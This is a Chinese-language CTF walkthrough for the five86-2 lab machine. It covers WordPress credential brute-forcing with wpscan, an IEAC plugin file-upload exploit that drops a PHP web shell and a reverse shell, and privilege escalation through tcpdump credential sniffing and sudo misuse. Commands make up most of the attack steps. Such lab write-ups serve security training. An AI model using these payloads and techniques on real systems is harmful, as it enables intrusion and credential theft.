five86-2

#主机探测-端口扫描

1
2
arp-scan -l
nmap -T4 -F -sS -sV 192.168.43.15

F12

#指纹识别-目录爆破

1
2
whatweb 192.168.43.15
dirsearch -u 192.168.43.15

F34

#wpscan

1
2
3
4
5
6
7
8
9
#爆破用户名
wpscan --url http://192.168.43.15 -e u
#爆破密码
wpscan --url http://192.168.43.15 -P /usr/share/wordlists/rockyou.txt -U use.txt
#得到账密
Username: barney
Password: spooky1
Username: stephen
Password: apollo1

​![屏幕截图 2023-10-24 115909](assets/屏幕截图 2023-10-24 115909-20231024142442-rr6lir0.png)

​​MI密码

#登录web界面

1
2
#barney spooky1
#可以看到这个站点安装了三个插件,但是只激活了一个Insert or Embed Articulate Content into WordPress Trial(IEAC)

web

#利用插件漏洞

1
2
3
4
5
6
7
8
9
#WordPress插件IEAC漏洞分析及组合利用尝试
#https://www.freebuf.com/vuls/205735.html
#该插件主要是可以快速的向文章中嵌入自己的学习内容(e-Learing),同时该插件可以直接对zip压缩文件进行处理,文件可以先压缩到zip中再一起上传到服务器中。
#生成poc.zip
echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
#上传POC.zip

ICEA上传zip

​![屏幕截图 2023-10-24 131528](assets/屏幕截图 2023-10-24 131528-20231024142519-uswoghd.png)​

​![屏幕截图 2023-10-24 131559](assets/屏幕截图 2023-10-24 131559-20231024142519-c75zo60.png)

​​![屏幕截图 2023-10-24 132312](assets/屏幕截图 2023-10-24 132312-20231024142535-752sfuo.png)​

#反弹shell

1
2
3
4
5
6
7
8
9
#上传EXP.zip
#利用kali自带的php-reverse-shell脚本反弹shell
echo "<html>hello</html>" > index.html
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
zip poc2222.zip index.html shell.php
#kali监听
nc -lvvp 8888
#交互式
pyhton3 -c 'import pty;pty.spawn("/bin/bash")'

shell--WEB

反弹shell

#切换stephen

1
2
3
4
5
6
#信息收集 
ls -ll
sudo -l
id
#发现stephen所属pcap组
进行流量抓包分析

​![屏幕截图 2023-10-24 134906](assets/屏幕截图 2023-10-24 134906-20231024142601-m4mxkkv.png)​

​![屏幕截图 2023-10-24 134924](assets/屏幕截图 2023-10-24 134924-20231024142601-9ny78ba.png)​

#抓包提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#tcpdump -D 即使在低特权下,tcpdump仍具有捕获所有网络浏览的功能

#检查”veth0c0a6b8”流量,并保存在pcap文件1.pcap
#timeout 120为2分钟,-w将结果输出到文件,-i是指定监听端口
cd /tmp
timeout 120 tcpdump -w 1.pcap -i veth0c0a6b8

tcpdump -r 1.pcap
#用-r读取流量包中的数据
#在数据包中找到ftp用户paul 密码是esomepasswford
#切换paul用户,查看sudo权限,paul可以使用peter的service命令
sudo paul
sudo -l
#直接执行peter的/bin/bash,用相对目录找到/bin/bash的位置
sudo -u peter service ../../bin/bash

​![IP ADDR](assets/IP ADDR-20231024142613-hezncwc.png)​

PAULde密码

#FLAG

1
2
3
4
#peter可以运行root用户的passwd命令,直接修改root密码
sudo -u root passwd root
#root
cat /root/thisistheflag.txt

PAUL-sudo

切换peter

​![屏幕截图 2023-10-24 141217](assets/屏幕截图 2023-10-24 141217-20231024142635-fq9vuam.png)​

该面膜提权